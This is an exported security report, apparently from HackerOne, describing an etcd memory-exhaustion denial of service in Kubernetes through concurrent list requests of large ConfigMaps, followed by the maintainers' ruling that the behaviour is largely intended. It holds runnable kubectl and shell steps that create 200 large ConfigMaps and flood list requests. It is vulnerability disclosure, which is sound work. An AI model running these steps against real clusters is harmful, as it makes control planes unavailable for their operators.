dlipovetsky/dos-report-not-accepted.md

## dos-report-not-accepted.md

      
    Raw
  

              dos-report-not-accepted.md
            
          
    Notes:

The report was not accepted. I intend to file a public issue, but haven't yet.
Kubernetes asks for reports to be submitted through https://hackerone.com. That's where I submitted the report. This is an export of the report

Title:         Concurrent list requests of many, large Kubernetes resources cause etcd members to exhaust almost all available memory
Scope:         https://github.com/kubernetes/kubernetes
Weakness:      Denial of Service
Severity:      Medium (6.5)
Link:          /reports/1058775
Date:          2020-12-14 21:20:50 +0000
By:            @dlipovetsky
CVE IDs:
Details:
Summary:

In a  Kubernetes cluster deployed with the default configuration, a user that can create and list large (e.g. 1MB) resources (e.g. ConfigMaps) can cause one or more etcd members to exhaust almost all available memory of the host, causing one or more control plane replicas to become unavailable. Although the kernel OOM-kills multiple processes, including etcd, in my experiments, affected control plane replicas needed to be restarted to become available.
Moreover, any client (e.g. a controller) that watches said resources may exhaust its available (e.g. restricted by a quota) memory when synchronizing its cache.
As the available memory of each control plane replica increases, so does the number of resources that must be created, and the number of concurrent list queries required  to make reproduce this vulnerability. For 3 control plane replicas, each with 16GB system memory, 200 1MB ConfigMaps, and 100 concurrent list requests should be sufficient. I have not yet looked for an upper bound of either the number of resources or concurrent list requests.
In v1.20,  API Priority and Fairness is enabled by default. It has had no effect on my experiments; although some of the concurrent list requests are throttled, etcd still exhausts available memory. To be fair, I have not changed the default configuration.
I have also replicated these experiments with Secrets (which, unlike ConfigMaps, can be larger than 1MB). Other resources may also work.
Kubernetes Version:

v1.20.0
v1.19.x
v1.18.x
Component Version:

etcd v3.4.13
etcd v3.4.3
Steps To Reproduce:


Deploy a Kubernetes cluster with the default configuration. I used kubeadm on an Ubuntu 20.04 VM.


Create role and rolebinding for system:serviceaccount:default:default


USER="system:serviceaccount:default:default"
kubectl create role configmap-readwriter --verb=create,list --resource=configmap
kubectl create rolebinding default-configmap-readwriter --user "$USER" --role configmap-readwriter

Create kubeconfig context for "system:serviceaccount:default:default" and cluster "kubernetes"
Note: You may need to change the CLUSTERNAME value.

CLUSTERNAME=kubernetes
TOKENNAME="$(kubectl get serviceaccount/default -o jsonpath='{.secrets[0].name}')"
TOKEN="$(kubectl get secret $TOKENNAME -o=jsonpath='{.data.token}' | base64 --decode)"
kubectl config set-credentials default-sa --token="$TOKEN"
kubectl config set-context default-sa --user=default-sa --cluster="$CLUSTERNAME"

(Optional) Verify the limited privileges

kubectl config use-context default-sa
kubectl auth can-i --list


(Optional) Observe the available memory on one or more control plane replicas
For example, use watch "free -h".


Using the context from Step 2, create 200 ConfigMaps, 1MB each, in the default namespace
kubectl config use-context default-sa
cat > cm.yaml<<EOF
apiVersion: v1
kind: ConfigMap
metadata:
  generateName: payload-
data:
  payload: $(base64 --wrap=0 /dev/urandom | head -c 1024768)
EOF
for i in {1..200}; do kubectl create -f cm.yaml; done


Using the context from Step 2, list all ConfigMaps in the default namespace, 100 times, concurrently


kubectl config use-context default-sa
for i in {1..100}; do kubectl get configmaps & done
Supporting Material/References:

Exhausting available memory while responding to list queries seems to be a known issue for etcd: etcd-io/etcd#12457 (comment). There is a proposal to add a QoS mechanism to protect etcd from its clients.
Impact

An attack could make the cluster control plane unavailable. It could also cause other API clients (e.g. controllers) to exhaust their available memory.
Timeline:
2020-12-14 21:23:37 +0000: @dlipovetsky (comment)
This is my first time estimating CVE severity. My coworkers reviewed my report, and had no objections, but I take responsibility, and apologize, if the severity is incorrect.

2020-12-15 11:35:06 +0000: @turtle_shell (bug triaged)
Hello @dlipovetsky,
Thank you for your submission! We were able to validate your report, and have submitted it to the appropriate remediation team for review. They will let us know the final ruling on this report, and when/if a fix will be implemented. Please note that the status and severity are subject to change.
Regards,
@turtle_shell

2020-12-15 11:41:34 +0000: @turtle_shell (report severity updated)

2020-12-15 16:58:24 +0000: @dlipovetsky (comment)
Thanks for triaging this, and the update, @turtle_shell.
I realize that this issue might be seen as a failure to "tuning the control plane for the appropriate scale," but I suspect that the attack works at any scale, though I admit I have not tested this exhaustively.

2020-12-16 17:30:31 +0000: @dlipovetsky (comment)

There is a proposal to add a QoS mechanism to protect etcd from its clients.
I misunderstood this proposal. It's more about fairness, and I don't think it will address the issue I'm reporting.


2020-12-18 22:40:25 +0000: @tallclair (bug informative)
I've reviewed this issue with several of the kubernetes API machinery leads, and we've concluded that this is largely working as intended. Existing mitigations include:


we don't allow anonymous users to do this
resourcequota can be used to limit how many configmaps can exist in a namespace
the audit logs let you find which user is abusing you
naughty, non-anonymous users can be handled out of band
naughty, non-anonymous users that aren't constrained by quota can do all sorts of bad things to your cluster


Furthermore, there are known scalability issues with list requests, but those are being handled as scalability and performance bugs, not as security issues.
If you are not satisfied with these mitigations, I encourage you to file a public issue or raise the concerns with SIG API Machinery

2020-12-18 22:40:51 +0000: @tallclair (agreed on going public)

2020-12-19 00:08:46 +0000: @dlipovetsky (comment)
Thanks for reviewing, and the feedback, @tallclair.
I'll take some time to see whether I can reproduce this taking namespace resource quotas into account.